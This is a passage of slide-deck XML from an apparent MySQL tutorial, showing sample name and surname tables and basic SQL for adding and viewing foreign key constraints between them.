                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to join two tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2828" name="Google Shape;2828;p460"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="553250" y="2741200"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1396700"/>
                <a:gridCol w="1498850"/>
                <a:gridCol w="1341025"/>
              </a:tblGrid>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900"/>
                        <a:t>N</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr b="1" lang="en" sz="900"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900"/>
                        <a:t>(int </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900"/>
                        <a:t>unsigned</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900"/>
                        <a:t> PK AI)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>name</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>sid(FK)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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ANIL</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r h="3223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ABHISHEK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3</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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ABDUL</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3223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RAJVIR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a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2829" name="Google Shape;2829;p460"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5271125" y="2620500"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1562125"/>
                <a:gridCol w="1799100"/>
              </a:tblGrid>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>S</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr b="1" lang="en" sz="1200"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(int unsigned PK AI)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>surname</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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SINGH</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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DOLLOR</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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BAIRAGI</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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KHAN</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2830" name="Google Shape;2830;p460"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599675" y="828350"/>
            <a:ext cx="2618100" cy="9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ANIL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DOLLOR</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ABHISHESK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>BAIRAGI</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ABDUL KHAN</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RAJVIR SINGH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2831" name="Google Shape;2831;p460"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235850" y="2146725"/>
            <a:ext cx="2116800" cy="2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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2832" name="Google Shape;2832;p460"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5956125" y="2216300"/>
            <a:ext cx="2354400" cy="2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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>surname</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2833" name="Google Shape;2833;p460"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755750" y="1719375"/>
            <a:ext cx="2549400" cy="2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rgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>25oct2023_db</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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7" name="Shape 2837"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2838" name="Google Shape;2838;p461"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1952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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to setup </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>constraint</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> b/w two tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2839" name="Google Shape;2839;p461"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="553250" y="1522000"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1396700"/>
                <a:gridCol w="1498850"/>
                <a:gridCol w="1341025"/>
              </a:tblGrid>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900"/>
                        <a:t>Nid</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr b="1" lang="en" sz="900"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900"/>
                        <a:t>(int unsigned PK AI)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>name</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800"/>
                        <a:t>sid(FK)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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ANIL</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r>
              <a:tr h="3223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ABHISHEK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3</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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ABDUL</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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RAJVIR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a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2840" name="Google Shape;2840;p461"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5271125" y="1401300"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1562125"/>
                <a:gridCol w="1799100"/>
              </a:tblGrid>
              <a:tr h="322325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>Sid</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr b="1" lang="en" sz="1200"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(int unsigned PK AI)</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200"/>
                        <a:t>surname</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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SINGH</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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DOLLOR</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3223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BAIRAGI</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="32232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KHAN</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2841" name="Google Shape;2841;p461"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235850" y="927525"/>
            <a:ext cx="2116800" cy="2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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2842" name="Google Shape;2842;p461"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5956125" y="997100"/>
            <a:ext cx="2354400" cy="2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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>surname_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2843" name="Google Shape;2843;p461"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553250" y="3717575"/>
            <a:ext cx="7237200" cy="11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100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER TABLE name_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADD CONSTRAINT fk_name_tbl_sid</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FOREIGN KEY (sid) REFERENCES surname_tbl(sid);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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sp>
        <p:nvSpPr>
          <p:cNvPr id="2848" name="Google Shape;2848;p462"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5000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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to show constraint  of tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2849" name="Google Shape;2849;p462"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646075" y="1582175"/>
            <a:ext cx="7738800" cy="24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accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	SHOW CREATE TABLE your_table_name;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHOW CREATE TABLE inventory_history_tbl;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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463"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5000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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to delete f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oreign</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> key constraint  from tables?</a:t>
